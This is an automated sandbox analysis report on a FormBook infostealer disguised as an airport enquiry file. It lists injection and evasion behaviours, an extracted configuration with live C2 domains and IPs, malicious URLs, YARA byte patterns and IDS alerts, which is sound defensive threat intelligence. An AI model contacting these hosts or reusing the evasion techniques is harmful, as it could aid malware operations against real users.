Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Al Maktoum International Airport Enquiry Ref #2401249.exe

Overview

General Information

Sample name:New Al Maktoum International Airport Enquiry Ref #2401249.exe
Analysis ID:1499643
MD5:621c253a4d715e3af16fe8be2fdd8cb1
SHA1:68ce09cc59887c7f9649f22e6688028957d6c55e
SHA256:007c997b49ac0889e71757762c82432a975a273eda4c871acec3c0823c6ea530
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • New Al Maktoum International Airport Enquiry Ref #2401249.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe" MD5: 621C253A4D715E3AF16FE8BE2FDD8CB1)
    • svchost.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • msiexec.exe (PID: 7504 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
          • cmd.exe (PID: 7560 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.wheresthechocolateat.com/pt46/"], "decoy": ["twinportslocal.com", "rovor.store", "98169.club", "mdywl.com", "jrd3s.rest", "aston1717.top", "floridawoodworkingmachinery.com", "17tk555t.com", "ankitsho.shop", "seclameh.com", "realrecordlabel.com", "trenchonbirmingham.com", "af28.top", "rtp1kenzototo.com", "theselflovesite.com", "promotegetpaid.info", "strategiclogisticsagency.com", "learneracademy.net", "per-watch.com", "betbox2341.com", "22958.xyz", "birthdaywishestexts.com", "nihilculturamail.com", "vasymaman.com", "evriukpostaes.sbs", "winkingbots.com", "cb214.pro", "osakanacreation.com", "kingchuxing.com", "dr-cotton.net", "iiixc759q.xyz", "eraplay88rtpgacor.lat", "wguujb.com", "dental-implants-89083.bond", "liposuction-89237.bond", "harbalmaizik.com", "seoservicesdelhi.net", "fakefox.xyz", "wimetimephotos.com", "healthsaveplus.com", "wvufcw948o.top", "dieselrockpartners.com", "istchannelnet.com", "123moviesonl.com", "arlatwestern.shop", "cloudproduction.cloud", "gv3l1.vip", "casino-x-zerkalo27pm.xyz", "serverdayz.com", "dvdripguides.com", "vitalfitness.site", "c21candacedevillier.com", "gory12.online", "0452frl.com", "escpethemtrix.top", "koumimi.tech", "me29hs38g1.com", "dreziuy.xyz", "uddyen.shop", "asia76s.xyz", "melliccine.com", "olxelang.com", "paincareathome.com", "sliveringaf.christmas"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18849:$sqlite3step: 68 34 1C 7B E1
          • 0x1895c:$sqlite3step: 68 34 1C 7B E1
          • 0x18878:$sqlite3text: 68 38 2A 90 C5
          • 0x1899d:$sqlite3text: 68 38 2A 90 C5
          • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 10 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", CommandLine: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", ParentImage: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe, ParentProcessId: 7428, ParentProcessName: New Al Maktoum International Airport Enquiry Ref #2401249.exe, ProcessCommandLine: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", ProcessId: 7456, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", CommandLine: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", ParentImage: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe, ParentProcessId: 7428, ParentProcessName: New Al Maktoum International Airport Enquiry Ref #2401249.exe, ProcessCommandLine: "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe", ProcessId: 7456, ProcessName: svchost.exe

          Suricata Signatures

          Timestamp:2024-08-27T10:51:57.291670+0200
          SID:2031412
          Severity:1
          Source Port:49737
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-27T10:51:57.291670+0200
          SID:2031449
          Severity:1
          Source Port:49737
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-27T10:51:57.291670+0200
          SID:2031453
          Severity:1
          Source Port:49737
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-27T10:53:20.668970+0200
          SID:2031412
          Severity:1
          Source Port:49738
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-27T10:53:20.668970+0200
          SID:2031449
          Severity:1
          Source Port:49738
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-27T10:53:20.668970+0200
          SID:2031453
          Severity:1
          Source Port:49738
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-27T10:50:53.816844+0200
          SID:2031412
          Severity:1
          Source Port:49739
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-27T10:50:53.816844+0200
          SID:2031449
          Severity:1
          Source Port:49739
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-27T10:50:53.816844+0200
          SID:2031453
          Severity:1
          Source Port:49739
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-27T10:54:21.642054+0200
          SID:2031412
          Severity:1
          Source Port:49741
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-27T10:54:21.642054+0200
          SID:2031449
          Severity:1
          Source Port:49741
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-27T10:54:21.642054+0200
          SID:2031453
          Severity:1
          Source Port:49741
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-27T10:54:01.377326+0200
          SID:2031412
          Severity:1
          Source Port:49740
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-27T10:54:01.377326+0200
          SID:2031449
          Severity:1
          Source Port:49740
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-27T10:54:01.377326+0200
          SID:2031453
          Severity:1
          Source Port:49740
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://www.dreziuy.xyzAvira URL Cloud: Label: malware
          Source: http://www.iiixc759q.xyz/pt46/Avira URL Cloud: Label: malware
          Source: http://www.iiixc759q.xyz/pt46/www.sliveringaf.christmasAvira URL Cloud: Label: malware
          Source: http://www.arlatwestern.shopAvira URL Cloud: Label: phishing
          Source: http://www.arlatwestern.shop/pt46/www.betbox2341.comAvira URL Cloud: Label: phishing
          Source: http://www.dreziuy.xyz/pt46/www.af28.topAvira URL Cloud: Label: malware
          Source: http://www.arlatwestern.shop/pt46/?ara=0RpqK4N+sKWumQPIkFOTbgKQJXSBpFKqwGjlCYY5Ihaqw+DawbshP/fsCF3RmMSwrLNm&D8V=_FNDAzAvira URL Cloud: Label: phishing
          Source: http://www.dreziuy.xyz/pt46/Avira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.wheresthechocolateat.com/pt46/"], "decoy": ["twinportslocal.com", "rovor.store", "98169.club", "mdywl.com", "jrd3s.rest", "aston1717.top", "floridawoodworkingmachinery.com", "17tk555t.com", "ankitsho.shop", "seclameh.com", "realrecordlabel.com", "trenchonbirmingham.com", "af28.top", "rtp1kenzototo.com", "theselflovesite.com", "promotegetpaid.info", "strategiclogisticsagency.com", "learneracademy.net", "per-watch.com", "betbox2341.com", "22958.xyz", "birthdaywishestexts.com", "nihilculturamail.com", "vasymaman.com", "evriukpostaes.sbs", "winkingbots.com", "cb214.pro", "osakanacreation.com", "kingchuxing.com", "dr-cotton.net", "iiixc759q.xyz", "eraplay88rtpgacor.lat", "wguujb.com", "dental-implants-89083.bond", "liposuction-89237.bond", "harbalmaizik.com", "seoservicesdelhi.net", "fakefox.xyz", "wimetimephotos.com", "healthsaveplus.com", "wvufcw948o.top", "dieselrockpartners.com", "istchannelnet.com", "123moviesonl.com", "arlatwestern.shop", "cloudproduction.cloud", "gv3l1.vip", "casino-x-zerkalo27pm.xyz", "serverdayz.com", "dvdripguides.com", "vitalfitness.site", "c21candacedevillier.com", "gory12.online", "0452frl.com", "escpethemtrix.top", "koumimi.tech", "me29hs38g1.com", "dreziuy.xyz", "uddyen.shop", "asia76s.xyz", "melliccine.com", "olxelang.com", "paincareathome.com", "sliveringaf.christmas"]}
          Multi AV Scanner detection for domain / URL
          Source: http://www.sliveringaf.christmas/pt46/Virustotal: Detection: 5%Perma Link
          Source: http://www.theselflovesite.com/pt46/Virustotal: Detection: 5%Perma Link
          Multi AV Scanner detection for submitted file
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeReversingLabs: Detection: 31%
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeVirustotal: Detection: 29%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeJoe Sandbox ML: detected
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: msiexec.pdb source: svchost.exe, 00000001.00000003.1731890191.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732589593.0000000002DE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1731832178.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000003.00000002.4130359525.0000000000970000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: svchost.exe, 00000001.00000003.1731890191.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732589593.0000000002DE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1731832178.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4130359525.0000000000970000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1677807902.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1681546736.0000000004130000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1679568145.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1685637489.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.0000000003000000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4131442242.000000000514E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1732637113.0000000004C52000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1734235728.0000000004E07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4131442242.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1677807902.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1681546736.0000000004130000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1679568145.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1685637489.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1732726618.0000000003000000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000003.00000002.4131442242.000000000514E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1732637113.0000000004C52000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.1734235728.0000000004E07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4131442242.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.4144395601.0000000010E1F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.4130764013.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4132018408.00000000054FF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.4144395601.0000000010E1F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.4130764013.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.4132018408.00000000054FF000.00000004.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CE4696
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CEC9C7
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CEC93C FindFirstFileW,FindClose,0_2_00CEC93C
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CEF200
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CEF35D
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CEF65E
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CE3A2B
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CE3D4E
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CEBF27

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49740 -> 103.224.212.214:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49737 -> 104.18.24.121:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49741 -> 104.18.23.89:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49740 -> 103.224.212.214:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49741 -> 104.18.23.89:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49737 -> 104.18.24.121:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49740 -> 103.224.212.214:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49741 -> 104.18.23.89:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49737 -> 104.18.24.121:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49738 -> 103.235.46.96:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49738 -> 103.235.46.96:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49738 -> 103.235.46.96:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49739 -> 76.223.105.230:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49739 -> 76.223.105.230:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49739 -> 76.223.105.230:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.214 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 76.223.105.230 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.18.23.89 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.235.46.96 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.18.24.121 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.wheresthechocolateat.com/pt46/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.iiixc759q.xyz
          Source: DNS query: www.iiixc759q.xyz
          Source: DNS query: www.iiixc759q.xyz
          Source: DNS query: www.iiixc759q.xyz
